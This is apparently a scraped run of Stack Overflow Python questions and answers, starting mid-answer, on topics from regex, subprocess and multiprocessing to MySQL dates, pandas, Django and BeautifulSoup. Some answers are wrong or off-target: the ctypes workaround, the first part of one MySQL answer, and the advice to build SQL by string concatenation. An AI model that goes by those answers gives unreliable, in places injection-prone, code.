output1 = re.findall('(.*?)This message was created',data1,re.DOTALL)[0].replace("<br>",'')
print "Output is ..."
print(output1)
print "----------------------------------------"
print "Second Case..."
print data2
print "Output is ..."
    output2 = re.findall('(.*?)This message was created',data2,re.DOTALL)[0].replace("<br>",'')
print(output2)
Output:
C:\Users>python main.py
First case...
This is a message. <br><br>This message was created by Jimmy.
Output is ...
This is a message.
----------------------------------------
Second Case...
This is a message.
This message was created by Jimmy.
Output is ...
This is a message.
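To answer the "one expression" part: a single `re.sub` can handle both formats (a sketch, assuming the trailer always starts with optional `<br>` tags followed by "This message was created by"):

    import re

    def strip_trailer(message):
        # remove everything from the (optional) <br> tags before the trailer
        return re.sub(r'\s*(?:<br>)*\s*This message was created by .*$', '',
                      message, flags=re.DOTALL).strip()

    print(strip_trailer("This is a message. <br><br>This message was created by Jimmy."))
    # This is a message.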
|
Using py2exe packing python program with ply got strange error?
Question: I downloaded the [PLY](http://www.dabeaz.com/ply/), and ran a simple test in
`ply3.8/test/calclex.py`
# -----------------------------------------------------------------------------
# calclex.py
# -----------------------------------------------------------------------------
import sys
if ".." not in sys.path: sys.path.insert(0,"..")
import ply.lex as lex
tokens = (
'NAME','NUMBER',
'PLUS','MINUS','TIMES','DIVIDE','EQUALS',
'LPAREN','RPAREN',
)
# Tokens
t_PLUS = r'\+'
t_MINUS = r'-'
t_TIMES = r'\*'
t_DIVIDE = r'/'
t_EQUALS = r'='
t_LPAREN = r'\('
t_RPAREN = r'\)'
t_NAME = r'[a-zA-Z_][a-zA-Z0-9_]*'
def t_NUMBER(t):
r'\d+'
try:
t.value = int(t.value)
except ValueError:
print("Integer value too large %s" % t.value)
t.value = 0
return t
t_ignore = " \t"
def t_newline(t):
r'\n+'
t.lexer.lineno += t.value.count("\n")
def t_error(t):
print("Illegal character '%s'" % t.value[0])
t.lexer.skip(1)
# Build the lexer
lexer = lex.lex()
It works well. But when I use `py2exe` to pack it into an executable file and
run it, I get an error like:
Traceback (most recent call last):
File "calclex.py", line 46, in <module>
lexer = lex.lex()
File "ply\lex.pyc", line 906, in lex
File "ply\lex.pyc", line 580, in validate_all
File "ply\lex.pyc", line 822, in validate_rules
File "ply\lex.pyc", line 833, in validate_module
File "inspect.pyc", line 690, in getsourcelines
File "inspect.pyc", line 526, in findsource
File "inspect.pyc", line 403, in getfile
TypeError: <module '__main__' (built-in)> is a built-in module
Has anyone tried to pack the ply to executable file?
And my `setup.py` is as follows:
from distutils.core import setup
import py2exe
setup(console=["calclex.py"])
Answer: Ply insists that its grammars be defined in real files, not
virtualized filesystems. So it won't work with py2exe or pyinstaller or other
such programs which attempt to pack Python source files into single archives.
(See also [Pyinstaller and Ply IOError: source code not
available](http://stackoverflow.com/q/35589881).)
I don't know of a simple workaround. Perhaps it should be reported as a
feature request to the Ply maintainers.
|
Importing multiple revisions in sync into SVN
Question: I have been developing a project without SVN for a while and now I wish to use
SVN. I have been keeping many revisions of this project as a series of
numbered tar.bz2 files (tarballs). I would like to import these many tarballs
into an SVN repository and keep the revision numbers all in sync (so that
tarball NNN becomes repository revision NNN). There are many of these versions
(a few hundred), so doing it all manually is not an option. I will automate
this in bash and/or Python. There are many gaps in the version sequence (about
500 versions go up to almost 700). Any suggestions on how to do this (SVN
features)? When I get done, the repository should look like I have been using
SVN all along. Only this one project will be in this one repository.
Answer: In short: you can't do it _easy_ , because:
* revision-numbers in SVN-repo are a consecutive series of natural numbers without gaps (you can't commit r500 and r700 immediately after it)
* for _useful history_ (which tracks not only _states_ , but also changes) you'll have **A Big Headache (tm)** for detecting and storing adding|deleting|moving files in WC
If you find _any automatable_ solution for p.2 (I can't see one in pure
Subversion), then for p.1 (getting a repo with gaps) you can try to
* Commit all archives to the repo "as is", later dump the whole repo to a dump file, edit (by hand?!) the revision numbers in the human-readable dump, and load the dump into a new fresh repo
or
* Create the gaps at commit stage: commit _anything_ unrelated into some special part of the tree for the revisions which must not exist in the final state, dump the repo with that crap-tree excluded (svnadmin dump + svndumpfilter or svnrdump), and restore the dump into a new fresh repo
PS - I recommend that you do not deceive or cheat (all of the described tricks
can be exposed relatively easily and quickly; and not even exposure, just the
suspicion of foul play, will be enough): commit the archives as they are and use
the tarball filenames as a custom revision property for navigation and history.
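A rough sketch of that last suggestion (the repository URL, working-copy path
and property name are placeholders; note that setting revision properties
requires the repository's pre-revprop-change hook to allow it):
    import glob
    import re
    import shutil
    import subprocess

    REPO_URL = 'file:///path/to/repo'  # hypothetical repository URL
    WC = 'wc'                          # an existing checkout of REPO_URL

    for tarball in sorted(glob.glob('project-*.tar.bz2')):
        shutil.copy(tarball, WC)
        subprocess.check_call(['svn', 'add', '--force', WC])
        out = subprocess.check_output(['svn', 'commit', WC, '-m', tarball])
        rev = re.search(r'Committed revision (\d+)', out).group(1)
        # record the original tarball name on the revision for later navigation
        subprocess.check_call(['svn', 'propset', '--revprop', '-r', rev,
                               'orig:tarball', tarball, REPO_URL])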
|
how can i call mutiple files(bash files) from subprocess.call in python
Question: # I am trying to run all the bash scripts in the plugins folder
import sys,os,subprocess
folder_path=os.listdir(os.path.join(os.path.dirname(__file__),'plugins'))
sys.path.append(os.path.join(os.path.dirname(__file__),'plugins'))
for file in folder_path:
if file == '~':
continue
elif file.split('.')[1]=="sh":
print file
subprocess.call(['./plugins/${file} what'],shell=True,executable='/bin/bash')
it shows error:
bash: /bin/bash: ./plugins/: Is a directory
Answer: You'll need to actually insert the `file` variable into the subprocess call
string:
subprocess.call(['./plugins/%s what' % file],shell=True,executable='/bin/bash')
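As an aside, a sketch that avoids `shell=True` entirely (and the `IndexError`
that `file.split('.')[1]` would raise for names without a dot):
    import os
    import subprocess

    plugins_dir = os.path.join(os.path.dirname(__file__), 'plugins')
    for name in os.listdir(plugins_dir):
        if name.endswith('.sh'):
            # pass interpreter, script path and argument as separate list items
            subprocess.call(['/bin/bash', os.path.join(plugins_dir, name), 'what'])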
|
how to get a folder name and file name in python
Question: I have a python program named `myscript.py` which would give me the list of
files and folders in the path provided.
import os
import sys
def get_files_in_directory(path):
for root, dirs, files in os.walk(path):
print(root)
print(dirs)
print(files)
path=sys.argv[1]
get_files_in_directory(path)
The path I provided is `D:\Python\TEST`, and there are some folders and
sub-folders in it, as you can see in the output below:
C:\Python34>python myscript.py "D:\Python\Test"
D:\Python\Test
['D1', 'D2']
[]
D:\Python\Test\D1
['SD1', 'SD2', 'SD3']
[]
D:\Python\Test\D1\SD1
[]
['f1.bat', 'f2.bat', 'f3.bat']
D:\Python\Test\D1\SD2
[]
['f1.bat']
D:\Python\Test\D1\SD3
[]
['f1.bat', 'f2.bat']
D:\Python\Test\D2
['SD1', 'SD2']
[]
D:\Python\Test\D2\SD1
[]
['f1.bat', 'f2.bat']
D:\Python\Test\D2\SD2
[]
['f1.bat']
I need to get the output this way :
D1-SD1-f1.bat
D1-SD1-f2.bat
D1-SD1-f3.bat
D1-SD2-f1.bat
D1-SD3-f1.bat
D1-SD3-f2.bat
D2-SD1-f1.bat
D2-SD1-f2.bat
D2-SD2-f1.bat
How do I get the output this way? (Keep in mind the directory structure here is
just an example; the program should be flexible for any path.) Is there any `os`
function for this? Can you please help me solve this?
(Additional information: I am using Python 3.4.)
Answer: You could try using the `glob` module instead:
import glob
    glob.glob(r'D:\Python\Test\D1\*\*\*.bat')
Or, to just get the filenames
import os
import glob
    [os.path.basename(x) for x in glob.glob(r'D:\Python\Test\D1\*\*\*.bat')]
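If the nesting depth varies, a sketch with `os.walk` produces exactly the
dash-joined output from the question:
    import os

    def print_files_dashed(path):
        for root, dirs, files in os.walk(path):
            for name in files:
                # path relative to the start folder, e.g. D1\SD1\f1.bat
                rel = os.path.relpath(os.path.join(root, name), path)
                print(rel.replace(os.sep, '-'))

    print_files_dashed(r'D:\Python\Test')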
|
Python ctypes.BigEndianStructure can't store a value
Question: I am in trouble with ctypes.BigEndianStructure. I can't get the value that I
set to one of the fields. My code is like this:
import ctypes
class MyStructure(ctypes.BigEndianStructure):
_pack_ = 1
_fields_ = [
('fx', ctypes.c_uint, 7),
('fy', ctypes.c_ubyte, 1)
]
x = MyStructure()
It prints 0, as expected:
print x.fy # Prints 0
Then I set a value to it, but it still prints 0:
x.fy = 1
print x.fy # Still prints 0
Answer: I don't know why what you're doing doesn't work; it is certainly strange
behavior. I think this alternative code works:
import ctypes
class MyStructure(ctypes.BigEndianStructure):
_pack_ = 1
def __init__(self):
self.fx=ctypes.c_uint(7)
self.fy = ctypes.c_ubyte(1)
x = MyStructure()
x.fy = 7
print x.fy # prints 7
Or without the constructor:
import ctypes
class MyStructure(ctypes.BigEndianStructure):
_pack_ = 1
fx = ctypes.c_uint(7)
fy = ctypes.c_ubyte(1)
x = MyStructure()
x.fy = 7
print x.fy # prints 7
I have personally never used the `_fields_` attribute so I can't speak to the
odd behavior.
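A hedged guess at the root cause: mixing different base types (`c_uint` and
`c_ubyte`) in adjacent bit fields forces them into separate storage units,
which the big-endian byte swapping seems to mishandle. A sketch that keeps both
fields in one `c_ubyte` storage unit (an assumption, not verified on all
platforms):
    import ctypes

    class MyStructure(ctypes.BigEndianStructure):
        _pack_ = 1
        _fields_ = [
            ('fx', ctypes.c_ubyte, 7),  # same base type for both bit fields
            ('fy', ctypes.c_ubyte, 1),
        ]

    x = MyStructure()
    x.fy = 1
    print x.fy  # expected to print 1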
|
Getting python to run an application when the application needs an input file
Question:
import subprocess
subprocess.call(['C:\\Users\michael\\Desktop\\Test\\pdftotext'])
pdftotext is the application that will run if I use this ^ code. This works
fine, however, I'm trying to find a way to run pdftotext that includes the
pdf's file name which pdftotext uses to convert it into a text file.
Note this is NOT a question about pdftotext.
When I use cmd in windows to run this I simply type **pdftotext
_fileName_.pdf** and it converts the pdf file into a text file, no problem.
Now I want to do something equivalent with Python.
I changed it to this, but it doesn't work. I'm told "The system cannot find
the file specified", and I've put pdftotext in the same folder as
filename.pdf:
import subprocess
subprocess.call(['C:\\Users\michael\\Desktop\\Test\\pdftotext', 'filename.pdf'])
Answer: [subprocess.call](https://docs.python.org/2/library/subprocess.html) takes an
iterable where the first item is the executable and the following items are
switches and parameters.
This means the PDF file name must be passed as a second list item:
    import subprocess
    subprocess.call(['C:\\Users\\michael\\Desktop\\Test\\pdftotext', 'filename.pdf'])
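If the executable is found but the PDF is not, keep in mind that
`'filename.pdf'` is resolved relative to the Python process's working
directory, not the executable's folder. A sketch (assuming the PDF sits in the
same Test folder) passes `cwd` explicitly:
    import subprocess

    subprocess.call(['C:\\Users\\michael\\Desktop\\Test\\pdftotext', 'filename.pdf'],
                    cwd='C:\\Users\\michael\\Desktop\\Test')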
|
can a return value of a function be passed in the where clause
Question: I have Python code that displays a list of station IDs and air temperatures
for a certain number of days. In the code below I have passed the dates as a
list, but that is cumbersome coding since I have to write out all the dates in
the list. Is there any way I can pass the return value of a function to
the where clause? I want to know how a range of values with a start and end date
can be passed in the query below. Following is the code snippet:
import MySQLdb
import os,sys
import datetime
path="C:/Python27/"
conn = MySQLdb.connect (host = "localhost",user = "root", passwd = "CIMIS",db = "cimis")
c = conn.cursor()
message = """select stationId,Date,airTemperature from cimishourly where stationId in (2,7) and Date in ('2016,01,01','2016,01,04') """
c.execute(message,)
result=c.fetchall()
for row in result:
print(row)
conn.commit()
c.close()
Answer: Yes, you can substitute the return value of a function in your query. Because
`message` is just a string, you can concatenate it like you would any other
string:
    message = """select stationId,Date,airTemperature from cimishourly where
                 stationId in (2,7) and Date in (""" + functionToGetDates() + """)"""
The parentheses can be placed in the function or in the original string,
as I chose to do here.
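Note that concatenating values into SQL is fragile (and unsafe with user
input). A sketch using MySQLdb's parameter binding instead, where
`get_date_range()` is a hypothetical function returning the two boundary dates:
    start, end = get_date_range()  # hypothetical helper returning two date strings
    message = """select stationId, Date, airTemperature from cimishourly
                 where stationId in (2, 7) and Date between %s and %s"""
    c.execute(message, (start, end))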
|
truncated incorrect value
Question: I have Python code that displays a range of dates. In the code below I have
passed the dates in the select operation by casting the dates and using the
STR_TO_DATE function. I want to know how a range of values with a start and end
date can be passed in the query below. What I want to achieve is to give a
range of dates, and the script should find those dates in the MySQL table and
display them. The date column in MySQL is varchar type, so I need to
convert varchar to date and then use the BETWEEN operator to get the range of
dates. Following is the code snippet:
import MySQLdb
import os,sys
import datetime
path="C:/Python27/"
conn = MySQLdb.connect (host = "localhost",user = "root", passwd = "CIMIS",db = "cimis")
c = conn.cursor()
message = """select stationId,Date,hour,airTemperature from cimishourly where Date between CAST((SELECT STR_TO_DATE('5/16/2011 ', '%c/%e/%Y')) AS DATE) and CAST((SELECT STR_TO_DATE('5/18/2011 ', '%c/%e/%Y')) AS DATE)"""
c.execute(message,)
result=c.fetchall()
for row in result:
print(row)
conn.commit()
c.close()
The error message is: truncated incorrect date value '6/8/1982'
Answer: First off, **Please include your error in your question**. This makes it
easier for people to help you.
I'm guessing from the title that you're trying to do something like:
l = ["list", "list2"]
print(l + s)
That is incorrect. You can't add a variable of type string and a variable of
type list together.
If you're trying to add your strings and list all into one string, use the
built-in Python function `str()` to convert a list to a string, and then use
`.join` to join the strings:
s = "string"
l = ["list", "list2"]
print(str(''.join(l)) + s)
#output: listlist2string
If you're trying to convert your strings into a list, use the built-in Python
function `list()`, which converts the string to a list:
s = "string"
l = ["list", "list2"]
print(l + list(s))
#output: ['list', 'list2', 's', 't', 'r', 'i', 'n', 'g']
Or, if you're trying to add a string to every other string in your list, use a
list comprehension:
s = "string"
l = ["list", "list2"]
ls = [str(''.join(i)) + s for i in l]
print(ls)
#output :['liststring', 'list2string']
For more information on converting types in Python, I recommend reading:
<http://www.pitt.edu/~naraehan/python2/data_types_conversion.html>.
**EDIT**: After updating your title and posting the error message, I believe
that your problem stems from these lines: `(SELECT STR_TO_DATE('5/18/2011 ',
'%c/%e/%Y')`, which should be: `STR_TO_DATE('2011-05-18', '%Y-%m-%d')` (the
date literal has to match the format string, and the trailing space should go).
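Since the `Date` column itself is a varchar holding strings like `'6/8/1982'`,
the comparison only works once the column is converted too. A sketch of the
corrected query, assuming the stored format really is `%c/%e/%Y`:
    message = """select stationId, Date, hour, airTemperature from cimishourly
                 where STR_TO_DATE(Date, '%c/%e/%Y')
                 between STR_TO_DATE('5/16/2011', '%c/%e/%Y')
                     and STR_TO_DATE('5/18/2011', '%c/%e/%Y')"""
    c.execute(message)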
|
Convert string of list of dictionary to Python DataFrame
Question: I have a .JSON file which is around 3GB. I would like to read this JSON data
and load it into pandas data frames. Below is what I have done so far.
Step 1: Read JSON file
import pandas as pd
with open('MyFile.json', 'r') as f:
data = f.readlines()
Step 2: just take one component, since the data is huge and I want to see how it
looks
cp = data[0:1]
print(cp)
['{"reviewerID": "AO94DHGC771SJ", "asin": "0528881469", "reviewerName": "amazdnu", "helpful": [0, 0], "reviewText": "some review text...", "overall": 5.0, "summary": "Gotta have GPS!", "unixReviewTime": 1370131200, "reviewTime": "06 2, 2013"}\n']
Step 3: remove the newline ('\n') character
while ix<len(t):
t[ix]=t[ix].rstrip("\n")
ix+=1
Questions:
1. Why is this JSON data a string? Am I making any mistakes?
2. How do I convert it into a dictionary?
What I tried:
1. I tried `b=dict(zip(t[0::2],t[1::2]))`, but I get "'dict' object not callable"
2. Tried joining, but that did not work either
Can anyone please help me? Thanks!
Answer: Why haven't you tried `pandas.read_json`?
import pandas as pd
df = pd.read_json('MyFile.json')
Works for the example you posted!
In[82]: i = '{"reviewerID": "AO94DHGC771SJ", "asin": "0528881469", "reviewerName": "amazdnu", "helpful": [0, 0], "reviewText": "some review text...", "overall": 5.0, "summary": "Gotta have GPS!", "unixReviewTime": 1370131200, "reviewTime": "06 2, 2013"}'
In[83]: pd.read_json(i)
Out[83]:
asin helpful overall reviewText reviewTime reviewerID reviewerName summary unixReviewTime
0 528881469 0 5 some review text... 06 2, 2013 AO94DHGC771SJ amazdnu Gotta have GPS! 1370131200
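For the full 3 GB file, where each line appears to be one JSON object, a sketch
that parses line by line and builds the frame once:
    import json
    import pandas as pd

    with open('MyFile.json') as f:
        records = [json.loads(line) for line in f]

    df = pd.DataFrame(records)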
|
Python itertools with multiprocessing - huge list vs inefficient CPUs usage with iterator
Question: I work on variations with repetition of n elements (named "pairs" below), used
as my function's arguments. Obviously everything works fine as long as the "r"
list is not big enough to consume all the memory. The issue is that I eventually
have to make more than 16 repetitions for 6 elements. I use a 40-core system in
the cloud for this.
The code looks like the following:
if __name__ == '__main__':
pool = Pool(39)
r = itertools.product(pairs,repeat=16)
pool.map(f, r)
I believe I should use an iterator instead of creating the huge list upfront,
and here the problem starts...
I tried to solve the issue with the following code:
if __name__ == '__main__':
pool = Pool(39)
for r in itertools.product(pairs,repeat=14):
pool.map(f, r)
The memory problem goes away, but the CPU usage is like 5% per core. Now the
single-core version of the code is faster than this.
I'd really appreciate it if you could guide me a bit.
Thanks.
Answer: Your original code isn't creating a `list` upfront in your own code
(`itertools.product` returns a generator), but `pool.map` is realizing the
whole generator (because it assumes if you can store all outputs, you can
store all inputs too).
Don't use `pool.map` here. If you need ordered results, using `pool.imap`, or
if result order is unimportant, use `pool.imap_unordered`. Iterate the result
of either call (don't wrap in `list`), and process the results as they come,
and memory should not be an issue:
if __name__ == '__main__':
pool = Pool(39)
for result in pool.imap(f, itertools.product(pairs, repeat=16)):
print(result)
If you're using `pool.map` for side-effects, so you just need to run it to
completion but the results and ordering don't matter, you could dramatically
improve performance by using `imap_unordered` and using `collections.deque` to
efficiently drain the "results" without actually storing anything (a `deque`
with `maxlen` of `0` is the fastest, lowest memory way to force an iterator to
run to completion without storing the results):
from collections import deque
if __name__ == '__main__':
pool = Pool(39)
deque(pool.imap_unordered(f, itertools.product(pairs, repeat=16)), 0)
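If the work done per item in `f` is tiny, a lot of wall time can still go to
IPC; both `imap` variants accept a `chunksize` argument that batches items per
worker round trip. A sketch (1024 is just a starting point to tune):
    from collections import deque

    deque(pool.imap_unordered(f, itertools.product(pairs, repeat=16),
                              chunksize=1024), 0)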
Lastly, I'm a little suspicious of specifying 39 `Pool` workers;
`multiprocessing` is largely beneficial for CPU bound tasks; if you're using
using more workers than you have CPU cores and gaining a benefit, it's
possible `multiprocessing` is costing you more in IPC than it gains, and using
more workers is just masking the problem by buffering more data.
If your work is largely I/O bound, you might try using a thread based pool,
which will avoid the overhead of pickling and unpickling, as well as the cost
of IPC between parent and child processes. Unlike process based pools, Python
threading is subject to
[GIL](https://wiki.python.org/moin/GlobalInterpreterLock) issues, so your CPU
bound work in Python (excluding GIL releasing calls for I/O, `ctypes` calls
into .dll/.so files, and certain third party extensions like `numpy` that
release the GIL for heavy CPU work) is limited to a single core (and in Python
2.x for CPU bound work you often waste a decent amount of that resolving GIL
contention and performing context switches; Python 3 removes most of the
waste). But if your work is largely I/O bound, blocking on I/O releases the
GIL to allow other threads to run, so you can have many threads as long as
most of them delay on I/O. It's easy to switch too (as long as you haven't
designed your program to rely on separate address spaces for each worker by
assuming you can write to "shared" state and not affect other workers or the
parent process), just change:
from multiprocessing import Pool
to:
from multiprocessing.dummy import Pool
and you get the
[`multiprocessing.dummy`](https://docs.python.org/3/library/multiprocessing.html#module-
multiprocessing.dummy) version of the pool, based on threads instead of
processes.
|
Get password in Python Programming Language
Question: Is there any built-in function that can be used for getting a password in
Python? I need it to behave like this:
    Enter a username: abcdefg
    Enter a password: ********
If I enter the password abcdefgt, it is shown as ********.
Answer: ### Original
There is a function in the standard library module
[`getpass`](https://docs.python.org/3/library/getpass.html#module-getpass):
>>> import getpass
>>> getpass.getpass("Enter a password: ")
Enter a password:
'hello'
This function does not echo any characters as you type.
### Addendum
If you absolutely **must** have `*` echoed while the password is typed, and
you are on Windows, then you can do so by butchering the existing
`getpass.win_getpass` to add it. Here is an example (untested):
def starred_win_getpass(prompt='Password: ', stream=None):
import sys, getpass
if sys.stdin is not sys.__stdin__:
return getpass.fallback_getpass(prompt, stream)
# print the prompt
import msvcrt
for c in prompt:
msvcrt.putwch(c)
# read the input
pw = ""
while 1:
c = msvcrt.getwch()
if c == '\r' or c == '\n':
break
if c == '\003':
raise KeyboardInterrupt
if c == '\b':
pw = pw[:-1]
# PATCH: echo the backspace
msvcrt.putwch(c)
else:
pw = pw + c
# PATCH: echo a '*'
msvcrt.putwch('*')
msvcrt.putwch('\r')
msvcrt.putwch('\n')
return pw
Similarly, on unix, a solution would be to butcher the existing
`getpass.unix_getpass` in a similar fashion (replacing the `readline` in
`_raw_input` with an appropriate `read(1)` loop).
|
Send data from django to html
Question: I want to get data from the database and send it to an HTML page using
Django/Python.
What I'm doing in the Python file is
def module1(request):
table_list=student.objects.all()
context={'table_list' : table_list}
return render(request,'index.html',context)
And in html is
<div class="rightbox">
In right box. data is :<br> <br>
{% if table_list %}
<ul> {% for item in table_list %}
<li>{{ item.name }}</li>
<li>{{ item.address }}</li>
<li>{{ item.mob_no }}</li>
{% endfor %}
</ul>
{% else %}
<p>somethings is wrong</p>
{% endif %}
</div>
Nothing is being sent to the HTML file; it constantly goes into the else block.
I don't know where I'm making a mistake. Please help me.
Answer: Since we can't see your `student` model (which should be in your
`models.py` and imported in your `views.py`), and your code doesn't throw
any exceptions, it seems that your `table_list` is empty. To iterate it in a
more convenient way you can use the built-in `for ... empty` template tag:
<div class="rightbox">
In right box. data is :<br> <br>
<ul>
{% for item in table_list %}
<li>{{ item.name }}</li>
<li>{{ item.address }}</li>
<li>{{ item.mob_no }}</li>
{% empty %}
<p>somethings is wrong</p>
{% endfor %}
</ul>
</div>
Try this and see what happens. If you end up in the `{% empty %}` block, your
`table_list` is empty, which points to an empty table in the database.
Also check
[docs](https://docs.djangoproject.com/en/1.9/ref/templates/builtins/#for-
empty) for this tag.
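For reference, a minimal sketch of what the assumed `student` model could look
like (the field types and lengths are guesses based on your template):
    # models.py -- hypothetical; adjust field types/lengths to your data
    from django.db import models

    class student(models.Model):
        name = models.CharField(max_length=100)
        address = models.CharField(max_length=200)
        mob_no = models.CharField(max_length=15)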
|
Python pandas producing error when trying to access 'DATE' column on large data set
Question: I have a file with 3'502'379 rows and 3 columns. The following script is
supposed to be executed but raises and error in the date handling line:
import matplotlib.pyplot as plt
import numpy as np
import csv
import pandas
path = 'data_prices.csv'
data = pandas.read_csv(path, sep=';')
data['DATE'] = pandas.to_datetime(data['DATE'], format='%Y%m%d')
This is the error that occurs:
Traceback (most recent call last):
File "C:\Program Files\Python35\lib\site-packages\pandas\indexes\base.py", line 1945, in get_loc
return self._engine.get_loc(key)
File "pandas\index.pyx", line 137, in pandas.index.IndexEngine.get_loc (pandas\index.c:4066)
File "pandas\index.pyx", line 159, in pandas.index.IndexEngine.get_loc (pandas\index.c:3930)
File "pandas\hashtable.pyx", line 675, in pandas.hashtable.PyObjectHashTable.get_item (pandas\hashtable.c:12408)
File "pandas\hashtable.pyx", line 683, in pandas.hashtable.PyObjectHashTable.get_item (pandas\hashtable.c:12359)
KeyError: 'DATE'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\data\script.py", line 15, in <module>
data['DATE'] = pandas.to_datetime(data['DATE'], format='%Y%m%d')
File "C:\Program Files\Python35\lib\site-packages\pandas\core\frame.py", line 1997, in __getitem__
return self._getitem_column(key)
File "C:\Program Files\Python35\lib\site-packages\pandas\core\frame.py", line 2004, in _getitem_column
return self._get_item_cache(key)
File "C:\Program Files\Python35\lib\site-packages\pandas\core\generic.py", line 1350, in _get_item_cache
values = self._data.get(item)
File "C:\Program Files\Python35\lib\site-packages\pandas\core\internals.py", line 3290, in get
loc = self.items.get_loc(item)
File "C:\Program Files\Python35\lib\site-packages\pandas\indexes\base.py", line 1947, in get_loc
return self._engine.get_loc(self._maybe_cast_indexer(key))
File "pandas\index.pyx", line 137, in pandas.index.IndexEngine.get_loc (pandas\index.c:4066)
File "pandas\index.pyx", line 159, in pandas.index.IndexEngine.get_loc (pandas\index.c:3930)
File "pandas\hashtable.pyx", line 675, in pandas.hashtable.PyObjectHashTable.get_item (pandas\hashtable.c:12408)
File "pandas\hashtable.pyx", line 683, in pandas.hashtable.PyObjectHashTable.get_item (pandas\hashtable.c:12359)
KeyError: 'DATE'
Answer: The `'\ufeffDATE'` in the first column name shows that your CSV file has a
[Byte Order Mark (BOM)
signature](https://en.wikipedia.org/wiki/Byte_order_mark#Representations_of_byte_order_marks_by_encoding),
so it must be read with the matching encoding.
So try this when reading your CSV:
df = pd.read_csv(path, sep=';', encoding='utf-8-sig')
or as [@EdChum suggested](http://stackoverflow.com/questions/38846590/python-
pandas-producing-error-when-trying-to-access-date-column-on-large-
data/38846829#comment65058304_38846590):
df = pd.read_csv(path, sep=';', encoding='utf-16')
Both variants should work properly.
PS [this answer](http://stackoverflow.com/a/17912811/5741205) shows how to
deal with BOMs
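If re-reading the file is not an option, a small fallback sketch strips a stray
BOM character from the already-loaded column names:
    # strip a leading BOM character from each column name
    df.columns = [col.lstrip('\ufeff') for col in df.columns]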
|
trying to scrape text from html that doesnt have any distinctive tags except br, PYTHON 3
Question: So I have been making a scraping program for my company's websites, but I have
run into an issue: basically, I need to scrape text out of an HTML table, but
I am having trouble getting the data I need.
HTML CODE
<div>
<table class="style3" cellspacing="0" rules="all" border="1" id="ctl00_cpMainContent_gvNodes" style="border-color:White;border-style:None;width:1090px;border-collapse:collapse;">
<tr>
<th scope="col">History</th>
</tr><tr>
<td style="color:White;background-color:White;font-size:11pt;font-weight:bold;"> </td>
</tr><tr>
<td style="color:White;background-color:Blue;border-color:Black;border-style:Inset;font-size:12pt;font-weight:normal;">date updated: 02/01/2014 21:42:52 | By: jakubkwasny | Status: Resolved</td>
</tr><tr>
<td style="color:Black;background-color:LightSkyBlue;border-color:LightSkyBlue;font-size:12pt;font-weight:normal;"><br />Root Cause: Hardware Failure<br />Action Completed: Power supply/filter/cable swap<br /><br />Arrival Time: 02/01/2014 15:54:17<br />Leaving Time: 02/01/2014 16:27:44<br />Was the job successful: Yes<br /><br /><br />Notes:replaced dsl cable and filter. Also rebooted all equipment. All working fine now.<br />Next Action required:none<br />Added by jakubkwasny at 02/01/2014 21:41:40<br /><br />Pinging 99.99.99.99 with 32 bytes of data:<br />Reply from 99.99.99.99: bytes=32 time=67ms TTL=240<br />Reply from 99.999.999.99: bytes=32 time=92ms TTL=240<br />Reply from 99.99.65.65: bytes=32 time=76ms TTL=240<br />Reply from 67.45.32.12: bytes=32 time=82ms TTL=240<br /><br />Ping statistics for 12.12.12.12:<br />Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),<br />Approximate round trip times in milli-seconds:<br />Minimum = 67ms, Maximum = 92ms, Average = 79ms</td>
</tr><tr>
<td style="color:White;background-color:White;font-size:11pt;font-weight:bold;"> </td>
I need to be able to scrape the data between the br tags, such as the data
attached to the third td tag. I have managed to scrape all the data from the
table but can't figure out how to get specific rows and then get the content
between the br tags.
CODE SNIPPET
bsobjswap = BeautifulSoup(r2.content)
print (bsobjswap.find('table',{'id':'ctl00_cpMainContent_gvNodes'}).find("style",{"color":"Black"}))
This is my latest attempt, but it doesn't work. Any help is appreciated.
MORE DATA
<div id="ctl00_cpMainContent_upNodes">
<div>
<table class="style3" cellspacing="0" rules="all" border="1" id="ctl00_cpMainContent_gvNodes" style="border-color:White;border-style:None;width:1090px;border-collapse:collapse;">
<tr>
<th scope="col">History</th>
</tr><tr>
<td style="color:White;background-color:White;font-size:11pt;font-weight:bold;"> </td>
</tr><tr>
<td style="color:White;background-color:Blue;border-color:Black;border-style:Inset;font-size:12pt;font-weight:normal;">date updated: 02/01/2014 21:21:16 | By: jakubkwasny | Status: Resolved</td>
</tr><tr>
<td style="color:Black;background-color:LightSkyBlue;border-color:LightSkyBlue;font-size:12pt;font-weight:normal;"><br />Root Cause: Core / Authentication issue<br />Action Completed: No site visit required<br /><br />Hi Chris,<br /><br />There were no faults detected. As installation have been done recently, Lancom uses 2.05 configuration script. Our engineer was unable to see landing page, he was getting connected to the Internet with. I contacted Picopoint who informed me that this is due the fact that their system remembers MAC addresses of the devices that were logged into the system hence no landing page is needed. It have been confirmed by removing MAC addresses of the engineer's devices from the database. By doing so engineer was able to access the landing page again. Picopoint's engineer checked the configuration of the devices at both ends and haven't detected any problems. At the moment we are unable to state what are the issues with venue as we haven't experienced any. <br /><br />Arrival Time: 02/01/2014 16:19:23<br />Leaving Time: 02/01/2014 17:51:18<br />Was the job successful: Yes<br /><br /><br />Notes:Still physically missing lines 3 and 4. See screen shot.<br />Line 6 has a dial tone BUT no dsl is present on line.<br />Still getting some landing page errors.. My laptop now seems to work but my android phone justs connects to google with no landing page .<br /><br />Screen shots included but couldnt access youtube ( was recieveing an block ID error )<br />ASDA resriction ?<br /><br />Picopoint still looking into problem according to Jakub<br /><br />Next Action required:Ask Jakub<br />Added by jakubkwasny at 02/01/2014 21:10:12<br /><br />Pinging 11.11.11.11 with 32 bytes of data:<br />Reply from 11.11.11.11: bytes=32 time=47ms TTL=50<br />Reply from 11.11.11.11: bytes=32 time=38ms TTL=50<br />Reply from 11.11.11.11: bytes=32 time=39ms TTL=50<br />Reply from 11.11.11.11: bytes=32 time=41ms TTL=50<br /><br />Ping statistics for 11.11.11.11:<br />Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),<br />Approximate round trip times in milli-seconds:<br />Minimum = 38ms, Maximum = 47ms, Average = 41ms</td>
</tr><tr>
<td style="color:White;background-color:White;font-size:11pt;font-weight:bold;"> </td>
My code visits thousands of pages, and looking at them, each table follows the
same pattern; I am guessing I will always need the data from the third td
tag, but I am not sure how to get it.
Cheers
Answer: How about this:
from bs4 import BeautifulSoup
html = """(your html from the example above)"""
soup = BeautifulSoup(html, 'html.parser')
row_data = soup.find('td', {'style':'color:Black;background-color:LightSkyBlue;border-color:LightSkyBlue;font-size:12pt;font-weight:normal;'})
